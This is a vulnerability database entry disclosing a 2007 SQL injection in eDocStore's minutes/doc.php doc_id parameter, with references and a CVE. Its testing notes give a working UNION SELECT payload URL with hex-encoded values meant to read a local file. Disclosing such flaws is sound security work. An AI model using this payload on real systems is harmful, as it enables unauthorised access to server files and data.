eDocStore essentials/minutes/doc.php doc_id Variable SQL Injection

2007-06-25T00:00:00
ID OSVDB:36292
Type osvdb
Reporter xprog(), t0pP8uZz()
Modified 2007-06-25T00:00:00

Description

Manual Testing Notes

http://[target]/essentials/minutes/doc.php?action=inline&doc_id=-1%20UNION%20ALL%20SELECT%200x2E2E2F696E6465782E706870,0x746578742F706C61696E,null,null,null,null,null

References:

Secunia Advisory ID:25831 Other Advisory URL: http://milw0rm.com/exploits/4108 ISS X-Force ID: 35057 FrSIRT Advisory: ADV-2007-2327 CVE-2007-3452